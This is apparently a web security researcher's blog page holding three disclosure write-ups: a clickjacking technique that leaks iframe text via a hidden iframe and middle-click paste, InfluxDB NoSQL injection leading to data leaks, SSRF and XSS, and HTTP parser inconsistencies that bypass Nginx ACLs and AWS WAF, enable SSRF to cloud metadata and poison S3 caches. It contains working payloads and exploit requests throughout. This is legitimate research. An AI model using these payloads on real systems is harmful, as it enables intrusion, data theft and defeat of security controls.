Rafa's Security Researches

AuxClickjacking

Rafael da Costa Santos — Mon, 17 Nov 2025 22:24:36 GMT

In this small and fun research, I will show how I developed a Clickjacking technique that leaks iframe contents by prompting the user to perform a click and drag + middle mouse button (wheel) click. I’m not sure if it’s already being exploited, but for now, I’m calling this AuxClickjacking.

Select Text + Wheel Click

One day, I accidentally discovered a very useful feature on modern browsers: If you select a text and then click with the middle button of the mouse on any field/tab, the selected text will be pasted in that field. Since then, I've used this feature frequently, until one day it occurred to me whether I could abuse this behavior.

Iframe Abuse

The first thing I wanted to test was whether iframe content could be copied using this feature, and unsurprisingly, it worked:

I also noticed that an iframe with near-zero opacity can still be copied, which already hints at a potential clickjacking-like scenario.

Next, I wondered: “What if I simulate a click-and-drag interaction, but place a hidden iframe underneath, will its content be copied?”
The answer is no: modern browsers enforce a strict sandbox here. If you try selecting text across both the parent page and a hidden iframe, only the first source in the selection (the parent window) is actually copied.

So the real question became: “What if I can make the iframe the first source of the selection?”
And that’s how I came up with the idea to build an exploit inspired by click-and-drag mechanics used in many web-based games.

The Billiards Game

In this example, I’m leaking the contents of https://example.com: https://clickjacking1337.s3.us-east-1.amazonaws.com/index.html.

The core idea behind this exploit is to trick the user into performing a click-and-drag interaction to “shoot” the ball into the pocket. Visually, the user believes they are interacting with a simple billiards-style mini-game:

However, behind the scenes, the user is actually clicking and dragging over a hidden , and to perform the “shot”, the game requires a middle-mouse (wheel) click, which will paste the iframe contents into our page. When the user drags the ball, they are unknowingly selecting the entire contents of the iframe, due to the automatic scrolling caused by the iframe’s constrained height.

The main limitation of this technique is that the first drag attempt fails because the initial interaction still happens inside the iframe’s DOM context. Fortunately, this behavior is detectable: once the iframe receives focus, the parent page triggers an onblur event, which allows the parent page to know if the iframe contents were copied or not. After the onblur event, the exploit can remove the iframe, leaving the user with a fully functional game interface while the selection event has already occurred. This way, the user will only think that it was a small bug in the game, and life goes on.

Below is a demonstration of how the exploit operates internally:

And here is what a real exploitation attempt looks like in practice:

Explaining Parts Of The Exploit Code

The iframe must have scrolling="yes" and a limited height. This way, the browser quickly performs the selection and scrolling in the entire page.
I’m using width="10000000" In the Iframe element, to avoid vertical scrollbars on it. This may cause the user to select the scrollbar instead of the iframe content.
The Iframe opacity needs to be near zero, enough to be unseen in the page: opacity:0.01;.

To leak the page data with the middle mouse button click, I’m creating a input element and adding a onClick event to it. This way, I can copy the pasted data:

 shotButton = document.createElement("input");
 shotButton.value = "Shoot Ball";
 /*More code*/
 shotButton.addEventListener("mouseup", (e) => {
     if (e.button === 1) {
         arrowCanvas.style.opacity = 0;
         launchBall();
         setTimeout(function(){
             document.getElementById("message-content").innerText = "Leaked Data :: " + shootball.value
             shootball.value = "Shoot Ball"
             shotButton.remove();
             shotButton = null;
         }, 1);
     }
 });

To detect if the iframe contents were already copied, I’m using the following code:

 window.addEventListener("blur", () => {
   setTimeout(function(){
     iframeElem.hidden="true" // Prevents the iframe element from being selected.
   }, 600)
 });

Conclusion

This technique works in both Chrome and Firefox, and I can honestly say I would fall for it myself in a browser game.

InfluxDB NoSQL Injection

Rafael da Costa Santos — Thu, 17 Aug 2023 11:43:33 GMT

In this post, I'll share my experience of discovering a NoSQL Injection vulnerability in a Bug Bounty program in a non-popular database within the hacking community.

During the initial discovery, I was expecting to find a good blog post or tool teaching how to exploit NoSQL Injection on InfluxDB, but this was not the case, so I needed to understand how this database works to develop payload techniques to leak data from it.

Furthermore, I'll explain how I took advantage of it to find an XSS and SSRF.

What is InfluxDB

InfluxDB is a popular open-source time series database that is designed for handling high volumes of timestamped data. InfluxDB is widely used for monitoring and analyzing metrics, events, and real-time data from various sources such as sensors, applications, and IoT devices.

Initial Vulnerability Discovery

During the WEB application analysis, I received the following error after sending the character " in a query parameter of the URL:

error @1:115-1:118: got unexpected token in string expression @1:118-1:118: EOF

This looked like a lot a injection issue, and after searching on Google, I concluded that the backend was using InfluxDB.

At this point, I started reading the documentation (https://docs.influxdata.com/influxdb/v2.7/) trying to figure out what is happening in the backend.

InfluxDB NoSQL Queries

This is a simple example of an InfluxDB NoSQL query:

from(bucket: "example-bucket")
    |> range(start: -1h)
    |> filter(fn: (r) => r._measurement == "example-measurement" and r.tag == "example-tag")

The given InfluxDB query retrieves data from the "example-bucket" within the last hour and filters the data based on specific conditions.

Here's a breakdown of each part of the query:

from(bucket: "example-bucket"): This part specifies the source bucket from which the data will be retrieved. InfluxDB organizes data into buckets, and here, the data will be fetched from the "example-bucket." Buckets are like database names in SQL languages.
|> range(start: -1h): This part sets the time range for the data retrieval. The range function is used to define a time window. In this case, it specifies the last hour of data from the current time. The parameter start: -1h means the data will be fetched from one hour ago until the current time.
|> filter(fn: (r) => r._measurement == "example-measurement" and r.tag == "example-tag"): This part applies a filter to the data based on certain conditions. The filter function is used to select specific data points that meet the defined criteria. The filter() performs operations similar to the SELECT statement and the WHERE clause in SQL-like languages.

In summary, the query fetches data from the "example-bucket" within the last hour and filters the data to include only those data points that belong to the measurement "example-measurement" and have a tag with the key "tag" and value "example-tag."

Building a Vulnerable WEB Application

After knowing the syntax, it's time to build our vulnerable application to finally build a working proof of concept on real-world applications.

The following code is a vulnerable server example:

const express = require('express');
const {InfluxDB, Point} = require('@influxdata/influxdb-client')

const app = express();

const token = 'REDACTED' // InfluxDB Token
const url = 'https://127.0.0.1' // Local Database endpoint
const org = 'myOrg'
const bucket = 'publicBucket'

const client = new InfluxDB({url, token})

async function query(fluxQuery) {
  results = []

  queryApi = client.getQueryApi(org)

  for await (const {values, tableMeta} of queryApi.iterateRows(fluxQuery)) {
    o = tableMeta.toObject(values)
    console.log(o)
    results.push(o)
  }

  return results
}

app.get('/query', async (req, res) => {
    try {
      const fluxQuery = 'from(bucket:"' + bucket + '") |> range(start: 0)  |> filter(fn: (r) => r._field == "public_field" and r._value == "' + req.query.data + '") '
      result = await query(fluxQuery)

      res.send(result)
    } catch (err) {
      res.send(err.toString())  
    }
});

const port = 3000;

app.listen(port, () => {
  console.log(`Server started on port ${port}`);
});

In the above example, the server is concatenating a user-supplied input at ' + req.query.data + ' to the InfluxDB query without any sanitization:

const fluxQuery = 'from(bucket:"' + bucket + '") |> range(start: 0)  |> filter(fn: (r) => r._field == "public_field" and r._value == "' + req.query.data + '") '
result = await query(fluxQuery)

And by sending an HTTP request containing the character " that will escape the string sequence of the query, we can confirm that it returns the same error previously seen in the Bug Bounty program server:

Building The Payload

Leaking Bucket Names

As said earlier, on InfluxDB, bucket names are like database names on other SQL languages, and like an SQL Injection exploitation process, it's crucial to find a way to leak these bucket names to get access to the entire database.

After carefully reading the documentation, and supposing that the injection occurs at the filter function, I achieved the following Error-based NoSQLI payload:

") |> yield(name: "1337") 
buckets() |> filter(fn: (r) => r.name =~ /^a.*/ and die(msg:r.name)) 
//

The buckets() function lists all the buckets from the current database.
The filter() function uses the r.name expression to filter for bucket names, which the r is the result of the buckets query, and name is a field returned in the buckets() function.
As you can see, the InfluxDB queries support regex with the =~ operation, so the logic behind the condition r.name =~ /^a.*/ is that it will be true if a bucket name starts with the letter a.
After that, the filter uses a and condition that calls the die() function with the value of the bucket name as a parameter. The die() function throws an error with a custom message passed in the first parameter, which will leak the bucket name.
The payload is also using the yield() function before the buckets query. This is necessary to perform "multiple queries" in a single request on InfluxDB.
Finally, it's necessary to separate the yield() from the buckets query with a new line, and at the end of the payload, I added the // expression after another new line to comment everything after our injection.

Resuming, if a bucket name that starts with the letter a exists in the database, it will trigger the die() function that will leak the bucket name in the error message. If no bucket starts with the sent letter, the server will return an empty output with no errors.

Trying on our vulnerable application we can see that no errors returned with the letter a:

But sending the same payload with the letter p leaks the bucket name privateBucket:

To leak all bucket names it's necessary to test all characters, adding another sequence after matching (for example pa, pb, pc ...).

Leaking The Bucket Field Names

Now that we have the names of the buckets we can try to fetch their contents, but like other SQL languages, sometimes we need to specify the column names to query specific data, and in this section, I will show a technique to leak these column names in InfluxDB.

During dynamic analysis, I was able to find a payload that triggers an error containing the data structure of any bucket:

") |> yield(name: "1337") 
 from(bucket: "privateBucket") |> range(start: 0) |> filter(fn: (r) => die(msg:r)) 
 //

The above payload uses a similar technique, using the yield() function and adding a comment at the end of the payload:

The payload now uses the from() function to fetch the data of the leaked bucket name, the range() which is necessary, and finally the filter().
In the filter() function, I called die() again, but now sending the entire result abject as a parameter. Since the die() function only accepts strings as parameters and the result object contains all the bucket data structure, the server will trigger a verbose error leaking it.

As you can see in the above screenshot, the server leaked this structure:

_value: B,
_time: time,
_stop: time,
_start: time,
_measurement: string,
_field: string

Now that we know the query structure, we can use a regex comparison to force an error to leak all field names:

") |> yield(name: "1337")
 from(bucket: "privateBucket") |> range(start: 0) |> filter(fn: (r) => r._field =~ /s.*/ and die(msg:r._field))
 //

As we can see, the vulnerable app leaked the field name sensitive_field because it matched the regex condition r._field =~ /s.*/.

Leaking Field Values

After leaking all field names, we can try to leak field values. Field values are the "final node" of InfluxDB, it's where the data is stored, in other words, leaking the values is the last step of the exploitation. To do that we can use the same technique used to leak the field names, but now specifying the field that we want to retrieve:

") |> yield(name: "1337")
 from(bucket: "privateBucket") |> range(start: 0) |> filter(fn: (r) => r._field == "sensitive_field" and die(msg:r._value))
 //

By sending the above payload, the server responded with an error:

HttpError: runtime error @2:54-2:124: filter: type conflict: string != int

This occurs because the data stored on r._value is an integer and the die() function only accepts strings. To circumvent that, we can use the string() function to convert the integer value to a string, successfully leaking it in the error message:

") |> yield(name: "1337")
 from(bucket: "privateBucket") |> range(start: 0) |> filter(fn: (r) => r._field == "sensitive_field" and die(msg:string(v:r._value)))
 //

As we can see in the above screenshot, the value of the sensitive_field is 1337. This means that we were able to fetch arbitrary data from other buckets!

InfluxDB Server-Side Request Forgery

While reading the documentation I noticed that some InfluxDB functions accept a host parameter, one of these functions is from():

By sending the host parameter in the from() function we can make HTTP requests to arbitrary URLs. The following payload is an example of an SSRF using the NoSQL Injection vulnerability:

") |> yield(name: "1337")
 from(bucket: "1337", host:"https://ATTACKER-SERVER") |> range(start:0)
 //

And this is the request received by my Burp Collaborator:

If the vulnerable application is using a local InfluxDB database, it's also possible to fetch internal endpoints.

This is not a vulnerability from InfluxDB, this is just a feature being abused by a NoSQL Injection that was raised from an insecure coding practice.

InfluxDB Cross-Site Scripting

Our example server is also prone to Reflected XSS attacks via the NoSQL Injection:

app.get('/query', async (req, res) => {
    try {
      const fluxQuery = 'from(bucket:"' + bucket + '") |> range(start: 0)  |> filter(fn: (r) => r._field == "public_field" and r._value == "' + req.query.data + '") '
      result = await query(fluxQuery)

      res.send(result)
    } catch (err) {
      res.send(err.toString())  
    }
});

If you have an XSS radar like me, you notice that when an error occurs in the InfluxDB query, the try{ } catch{ } statement sends the error back to the client with the Content-Type equals to text/html, allowing the browser load HTML and JavaScript.

Furthermore, we can control some data that is reflected in these errors, especially via the die() function:

Since the query API uses the GET method, it's possible to execute arbitrary JavaScript on the victim's browsers by sending a malicious link:

http://127.0.0.1:3000/query?data=%22)%20die(msg%3a%22%3cimg%20src%3dx%20onerror%3dalert(document.domain)%3e%22)%2f%2f

") die(msg:"")//

This is not an InfluxDB vulnerability because the issue raises from a NoSQL Injection caused by an insecure coding practice and an insecure default Content-Type by NodeJS.

Conclusion

In this blog post, I described my exploit development process of a NoSQL Injection vulnerability in a non-popular database within the hacking community and how I leveraged this issue to achieve an SSRF and XSS.

Exploiting HTTP Parsers Inconsistencies

Rafael da Costa Santos — Sat, 17 Jun 2023 17:25:25 GMT

The HTTP protocol plays a vital role in the seamless functioning of web applications, however, the implementation of HTTP parsers across different technologies can introduce subtle discrepancies, leading to potential security loopholes.

In this research, my focus revolves around the discovery of inconsistencies within HTTP parsers across various web technologies, including load balancers, reverse proxies, web servers, and caching servers. By investigating these disparities, I aim to shed light on potential new vulnerabilities that involve HTTP Desync attacks.

It was my first security research, I started on this journey in December 2021 and concluded in April 2022. I tried to be creative in finding new attack vectors due to incorrect HTTP parsing. In this post, I will share the final results of this study.

Pathname Manipulation: Bypassing Reverse Proxies and Load Balancers Security Rules

This section of the research focuses on the exploitable vulnerabilities arising from pathname manipulation in web servers, principally about the use of trim() or strip() functions. By exploiting these techniques, attackers can circumvent security rules specific to certain paths in reverse proxies and load balancers, posing a significant threat to web application security.

In this section, we delve into the intricacies of how web servers process and manipulate pathnames, investigating the impact of the removal of certain characters, which can lead to unintended behaviors.

Nginx ACL Rules

Nginx is a powerful web server and reverse proxy which allows developers to apply security rules on HTTP requests. This section explores security threads of the capabilities of Nginx in rewriting or blocking HTTP messages, with a primary focus on rules triggered by specific strings or regular expressions found within the HTTP pathname section.

In Nginx, the "location" rule enables developers to define specific directives and behaviors based on the requested URL. This rule acts as a key component in routing and processing incoming HTTP requests, allowing control over how different URLs are handled.

location = /admin {
    deny all;
}

location = /admin/ {
    deny all;
}

The above Nginx rule aims to deny every access to the /admin endpoint, so if a user tries to access this endpoint, Nginx will return 403 and will not pass the HTTP message to the web server.

To prevent security issues on URI-based rules, Nginx performs path normalization before checking them. Path normalization in Nginx refers to the process of transforming and standardizing requested URLs to a consistent and canonical format before handling them. It involves removing redundant or unnecessary elements from the URL path, such as extra slashes, dot segments, processing path traversal, and URL-encoded characters, to ensure uniformity and proper routing within the web server.

Trim Inconsistencies

Before we proceed, we need to understand what the trim() function does in different languages.

Different languages remove different characters when the correspondent function for trim() is called. Each server will normalize the pathname based on its trim(), removing different characters. But Nginx which is written in C, does not cover all characters for all languages.

E.g.: Python removes the character \x85 with strip(), and JavaScript does not with trim().

If an HTTP message is parsed using the trim() function in different languages, an HTTP Desync attack can occur.

Bypassing Nginx ACL Rules With Node.js

Let's consider the following Nginx ACL rule and Node.js API source code using Express:

location = /admin {
    deny all;
}

location = /admin/ {
    deny all;
}

app.get('/admin', (req, res) => {
    return res.send('ADMIN');
});

Following the trim() logic, Node.js "ignores" the characters \x09, \xa0, and \x0c from the pathname, but Nginx considers them as part of the URL:

First, Nginx receives the HTTP request and performs path normalization on the pathname;
As Nginx includes the character \xa0 as part of the pathname, the ACL rule for the /admin URI will not be triggered. Consequently, Nginx will forward the HTTP message to the backend;
When the URI /admin\x0a is received by the Node.js server, the character \xa0 will be removed, allowing successful retrieval of the /admin endpoint.

Below is a graphical demonstration of what happens with the HTTP request:

To gain a clearer understanding of how this vulnerability can be exploited, I recommend watching the accompanying proof of concept video below:

https://www.youtube.com/watch?v=sgs3s5oTfz8

Below is a table correlating Nginx versions with characters that can potentially lead to bypassing URI ACL rules when using Node.js as the backend:

Nginx Version	Node.js Bypass Characters
1.22.0	`\xA0`
1.21.6	`\xA0`
1.20.2	`\xA0`, `\x09`, `\x0C`
1.18.0	`\xA0`, `\x09`, `\x0C`
1.16.1	`\xA0`, `\x09`, `\x0C`

Bypassing Nginx ACL Rules With Flask

Flask removes the characters \x85, \xA0, \x1F, \x1E, \x1D, \x1C, \x0C, \x0B, and \x09 from the URL path, but NGINX doesn't.

Take the following nginx configuration/API source code as a reference:

location = /admin {
    deny all;
}

location = /admin/ {
    deny all;
}

@app.route('/admin', methods = ['GET'])
def admin():
    data = {"url":request.url, "admin":"True"}

    return Response(str(data), mimetype="application/json")

As you can see below, it's possible to circumvent the ACL protection by adding the character \x85 at the end of the pathname:

Nginx Version	Flask Bypass Characters
1.22.0	`\x85`, `\xA0`
1.21.6	`\x85`, `\xA0`
1.20.2	`\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B`
1.18.0	`\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B`
1.16.1	`\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B`

Bypassing Nginx ACL Rules With Spring Boot

Spring removes the characters \x09 and \x3B from the URL path, but Nginx doesn't.

Take the following Nginx configuration/API source code as a reference:

location = /admin {
    deny all;
}

location = /admin/ {
    deny all;
}

@GetMapping("/admin")
public String admin() {
    return "Greetings from Spring Boot!";
}

Below, you will find a demonstration of how ACL protection can be circumvented by adding the character \x09 or \t at the end of the pathname:

Nginx Version	Spring Boot Bypass Characters
1.22.0	`;`
1.21.6	`;`
1.20.2	`\x09`, `;`
1.18.0	`\x09`, `;`
1.16.1	`\x09`, `;`

Bypassing Nginx ACL Rules With PHP-FPM Integration

PHP-FPM (FastCGI Process Manager) is a robust and high-performance PHP FastCGI implementation that works seamlessly with Nginx. It serves as a standalone server for handling PHP requests, improving the speed and efficiency of PHP execution. Nginx acts as a reverse proxy, receiving incoming HTTP requests and passing them to PHP-FPM for processing.

Let's consider the following Nginx FPM configuration:

location = /admin.php {
    deny all;
}

location ~ \.php$ {
    include snippets/fastcgi-php.conf;
    fastcgi_pass unix:/run/php/php8.1-fpm.sock;
}

When two .php files are in the same pathname of the HTTP request, PHP will match the first one, ignoring everything after the slash. Since the Nginx is configured to block requests to the specific endpoint /admin.php, it's possible to access the admin.php file by doing the following request:

Below is a graphical example of how the applications interpret the HTTP request:

This technique only works if the second PHP file, in this case, index.php, exists in the server structure. Take the following server code/structure as a reference:

These behaviors were reported to the Nginx security team in 2022, and they responded by saying that they don't have responsibility for it.

Since the research concluded in April 2022, newer versions of Nginx were not specifically tested. However, it is highly likely that the findings and vulnerabilities identified in the research are reproducible in the latest version of Nginx as well.

How to prevent

To prevent these issues, you must use the ~ expression Instead of the = expression on Nginx ACL rules, for example:

location ~* ^/admin {
    deny all;
}

The ~ expression matches the string /admin in any part of the pathname, in other words, if a user sent a request to /admin1337, the request will also be blocked.

Bypassing AWS WAF ACL

How AWS WAF ACLs Work

AWS ACL (Access Control List) rules are a component of load balancers, providing control over incoming and outgoing network traffic. These rules define access permissions based on specified conditions, allowing or denying requests to and from the load balancer.

You can configure the AWS Web Application Firewall (WAF) ACL to examine and validate HTTP headers. AWS WAF ACL rules allow you to define conditions based on specific header attributes or values, enabling you to control and filter incoming requests.

Header ACL example:

In the above example, if a request contains a SQL Injection payload in the X-Query header, AWS WAF recognizes the SQL Injection attempt and responds with a 403 Forbidden HTTP status code. This prevents the request from being forwarded to the backend, effectively blocking any potential exploitation of the application's database through SQL Injection attacks.

As you can see, the above request carried the payload ' or '1'='1' -- at the X-Query header, and then was blocked by the AWS WAF.

Bypassing AWS WAF ACL With Line Folding

Web servers like Node.js, Flask and many others sometimes encounter a phenomenon known as "line folding." Line folding refers to the practice of splitting long header values using the characters \x09 (tab) and \x20 (space) into multiple lines for readability. However, this behavior can lead to compatibility issues and potential security vulnerabilities.

For example, the header 1337: Value\r\n\t1337 in the following request will be interpreted as 1337: Value\t1337 in the Node.js server:

GET / HTTP/1.1
Host: target.com
1337: Value
    1337
Connection: close

Knowing it, I discovered that it's possible to bypass the AWS WAF by using line folding behavior.

Using the same AWS WAF that protects the X-Query from SQL Injection payloads, the following HTTP request was used to confirm that the Node.js server received the payload ' or '1'='1' -- in the X-Query header.

Below is a graphical example of how the applications interpret the HTTP request header with line folding:

For the exploitation scenario, let's take the following Node.js source code as a reference. It will return the requested headers as a Json:

app.get('/*', (req, res) => {
    res.send(req.headers);
});

Below is an example of an exploitation request:

GET / HTTP/1.1\r\n
Host: target.com\r\n
X-Query: Value\r\n
\t' or '1'='1' -- \r\n
Connection: close\r\n
\r\n

In the provided screenshot, it is evident that the Node.js application interpreted the characters ' or '1'='1' -- as the value for the X-Query header. However, the AWS WAF treated it as a header name instead.

This bypass technique was reported to the AWS security team and fixed in 2022.

Incorrect Path Parsing Leads to Server-Side Request Forgery

In the previous sections, I provided reasons to be cautious about trusting reverse proxies. However, in this section, I will demonstrate why utilizing a reverse proxy can be advantageous...

In this section, I will leverage an incorrect pathname interpretation to exploit a Server-Side Request Forgery vulnerability in popular servers and frameworks such as Spring Boot, Flask, and PHP.

Normally, a valid HTTP pathname starts with / or http(s)://domain/, but the majority of the popular WEB servers do not verify it correctly, which can lead to a security risk.

SSRF on Flask Through Incorrect Pathname Interpretation

Flask is a lightweight web framework for Python, and it offers a straightforward and flexible approach to web development.

After conducting tests on Flask's pathname parsing, I discovered that it accepts certain characters that it shouldn't. As an example, the following HTTP request, which should be considered invalid, is surprisingly treated as valid by the framework, but the server responds 404 Not Found:

GET @/ HTTP/1.1
Host: target.com
Connection: close

While investigating how this behavior can potentially result in a security vulnerability, I came across a helpful Medium blog post that demonstrates the creation of a proxy using the Flask framework. Below is an example of the code provided in the blog post:

from flask import Flask
from requests import get

app = Flask('__main__')
SITE_NAME = 'https://google.com/'

@app.route('/', defaults={'path': ''})
@app.route('/')
def proxy(path):
  return get(f'{SITE_NAME}{path}').content

app.run(host='0.0.0.0', port=8080)

My first thought was: "What if the developer forgets to add the last slash in the SITE_NAME variable?". And yes, it can lead to an SSRF.

Since Flask also allows any ASCII character after the @, it's possible to fetch an arbitrary domain after concatenating the malicious pathname and the destination server.

Please consider the following source code as a reference for the exploitation scenario:

from flask import Flask
from requests import get

app = Flask('__main__')
SITE_NAME = 'https://google.com'

@app.route('/', defaults={'path': ''})
@app.route('/')

def proxy(path):
  return get(f'{SITE_NAME}{path}').content

if __name__ == "__main__":
    app.run(threaded=False)

Presented below is an example of an exploitation request:

GET @evildomain.com/ HTTP/1.1
Host: target.com
Connection: close

In the following example, I was able to fetch my EC2 metadata:

SSRF on Spring Boot Through Incorrect Pathname Interpretation

Upon discovering the presence of an SSRF vulnerability in Flask, I delved into exploring how this behavior could be exploited in other frameworks. As my research progressed, it became apparent that Spring Boot is also susceptible to this particular issue.

Authentication bypasses, ACL bypasses, and path traversal are known vectors when the application parses Matrix parameters. Servlet matrix parameters are a feature introduced in the Servlet specification that allows you to extract and handle additional data present in the URL path. Unlike query parameters that are separated by the ? character, matrix parameters are separated by the ; character within the URL.

During the research, I discovered that the Spring framework accepts the matrix parameter separator character ; before the first slash of the HTTP pathname:

GET ;1337/api/v1/me HTTP/1.1
Host: target.com
Connection: close

If a developer implements a server-side request that utilizes the complete pathname of the request to fetch an endpoint, it can lead to the emergence of Server-Side Request Forgery (SSRF).

Please consider the following source code as a reference for the exploitation scenario:

The code snippet above utilizes the HttpServletRequest API to retrieve the requested URL through the getRequestURI() function. Subsequently, it concatenates the requested URI with the destination endpoint http://ifconfig.me.

Considering that Spring permits any character following the Matrix parameter separator, becoming possible to use the @ character to fetch an arbitrary endpoint as well.

Below is an example of the exploit request:

GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close

PHP Built-in Web Server Case Study - SSRF Through Incorrect Pathname Interpretation

The PHP Built-in web server suffers from the same vulnerability. Still, the Built-in server is not used in production involvements, so I decided to present this behavior as a case study that is unlikely to happen in real-world applications.

Surprisingly, PHP allows the asterisk * character before the first slash in the pathname, and between the asterisk and the first slash, almost all ASCII characters are accepted as valid HTTP request.

However, there are two limitations that arise with PHP:

This technique can only be used for the root pathname / and cannot be applied to other endpoints, in other words, the vulnerable code must be in the index.php file;
Dots . are not allowed before the first slash, which restricts the inclusion of arbitrary IPs and domains, to circumvent it, the payload must include a dotless-hex encoded IP address of the malicious domain.

Let's consider the following PHP code for this exploitation scenario:


$site = "http://ifconfig.me";
$current_uri = $_SERVER['REQUEST_URI'];

$proxy_site = $site.$current_uri;
var_dump($proxy_site);

echo "\n\n";

$response = file_get_contents($proxy_site);
var_dump($response);
?>

The provided code retrieves the HTTP request pathname using $_SERVER['REQUEST_URI'] and concatenates it with the destination domain.

For performing IP address dotless-hex encoding, you can utilize the tool ip-encoder.py.

The resulting payload used for exploiting which fetches the EC2 metadata is as follows:

GET *@0xa9fea9fe/ HTTP/1.1
Host: target.com
Connection: close

In the following proof of concept, I successfully retrieved my EC2 metadata:

How to prevent

It is essential to consistently employ complete URL domains when concatenating them with user input. For instance, ensure that a trailing slash is added after the domain name, such as http://ifconfig.me/.
Utilizing a reverse proxy that effectively handles HTTP requests. The vulnerabilities mentioned are typically only possible if the framework is used without any additional reverse proxy that verifies the HTTP pathname. In other words, incorporating a reverse proxy can significantly enhance the security of the web application.

HTTP Desync Cache Poisoning Attacks

Inconsistencies exist among servers and reverse proxies when it comes to removing invalid invisible characters from header names before interpreting them. This inconsistency can lead to notable vulnerabilities, such as HTTP Request Smuggling. But in this section, I will discuss a vulnerability and technique that I discovered during my research that combines Desync attacks with Cache Poisoning, which affects cache servers when integrated with AWS S3 buckets.

But before we continue, we must understand some functionalities of cache servers.

Cache Keys

Cache keys are unique identifiers used by cache servers to store and retrieve cached data, they serve as references or labels that allow access to cached content.

The most frequently used cache key is typically derived from the URL's pathname. When a user sends a request to a server that utilizes caching, the cache server employs the requested URL to locate the corresponding cached response to serve back to the user.

In addition to the URL's pathname, another default cache key is the Host header. Let's consider a scenario where a cached JavaScript file is located at https://target.com/static/main.js. When a user sends an HTTP request to this cached URL, the cache server will return the stored response without having to forward the request to the backend server.

However, if a user sends an HTTP request to the same endpoint but modifies the Host header to 1337.target.com, the cache server will attempt to retrieve the backend of the corresponding response for the /static/main.js URL using the 1337.target.com host header. Subsequently, it will generate a stored response specifically for that particular HTTP message.

S3 HTTP Desync Cache Poisoning Issue

In this section, I will demonstrate an HTTP Desync vulnerability that can result in Cache Poisoning, impacting principally AWS S3 buckets.

In the Amazon AWS S3 buckets, the Host header plays a crucial role in routing requests to the correct bucket and enabling proper access to the stored content. When interacting with an S3 bucket, the Host header helps direct requests to the appropriate endpoint within the AWS infrastructure.

When a request is made to an S3 bucket, the AWS infrastructure inspects the Host header to determine the target bucket. So if a user sends an HTTP request to the domain your.s3.amazonaws.com but changes the host header to my.s3.amazonaws.com, internally, AWS will "ignore" the domain name, fetching the bucket specified in the host header only. This is a common practice on Cloud services.

The Vulnerability

The interpretation of host headers for S3 buckets involves two key aspects:

When multiple host headers are included in the request, only the first one will be taken, and any additional headers will be ignored.
The following bytes are ignored if present in the header name: \x1f, \x1d, \x0c, \x1e, \x1c, \x0b;

The vulnerability arises from an inconsistency in the host header interpretation. If the cache server mistakenly includes the ignored bytes as part of the header name, treating it as an invalid host header, while S3 interprets it as a valid host header, it becomes possible to cache arbitrary bucket responses on vulnerable websites.

This behavior allows caching arbitrary S3 bucket content in vulnerable websites.

Consider the following exploitation request:

GET / HTTP/1.1
[\x1d]Host: evilbucket.com
Host: example.bucket.com
Connection: close

First, the cache server examines the header \x1dHost: evilbucket.com and treats it like any other unkeyed header;
Subsequently, the cache server will correctly interpret the example.bucket.com header as a valid host header, resulting in the final cache response being associated with this host value.
Upon reaching the S3 bucket, the header \x1dHost: evilbucket.com will be mistakenly interpreted as a valid host header, while the intended Host: example.bucket.com header will be ignored. This misinterpretation by AWS will lead to the fetching of the malicious header's associated bucket.

The final result is a complete cache poisoning of the page with arbitrary content.

The proof of concept video demonstrates the exploitation of this vulnerability in an outdated Varnish cache server. It is important to note that newer versions of Varnish are not susceptible to this vulnerability:

https://www.youtube.com/watch?v=dnf6Zi5eNW8

In addition to Varnish, other cache servers such as Akamai were also vulnerable to this issue. However, it's important to note that this vulnerability has been addressed and cannot be reproduced on any AWS service today.

Conclusion

In conclusion, this research delved into the realm of security vulnerabilities in web applications, specifically focusing on HTTP parsers and the implications they can have on overall security. By exploring inconsistencies in HTTP parsers across various technologies, such as load balancers, reverse proxies, web servers, and caching servers, I unveiled potential avenues for exploitation.

I demonstrated how certain behaviors, like path normalization and the acceptance of special characters, can lead to bypassing security rules and even opening the door to Server-Side Request Forgery (SSRF) and Cache Poisoning vulnerabilities.

Moreover, I highlighted the significance of utilizing reverse proxies that effectively validate and sanitize HTTP requests. Implementing a robust reverse proxy can significantly bolster the security posture of a web application by intercepting and filtering malicious requests before they reach the backend servers.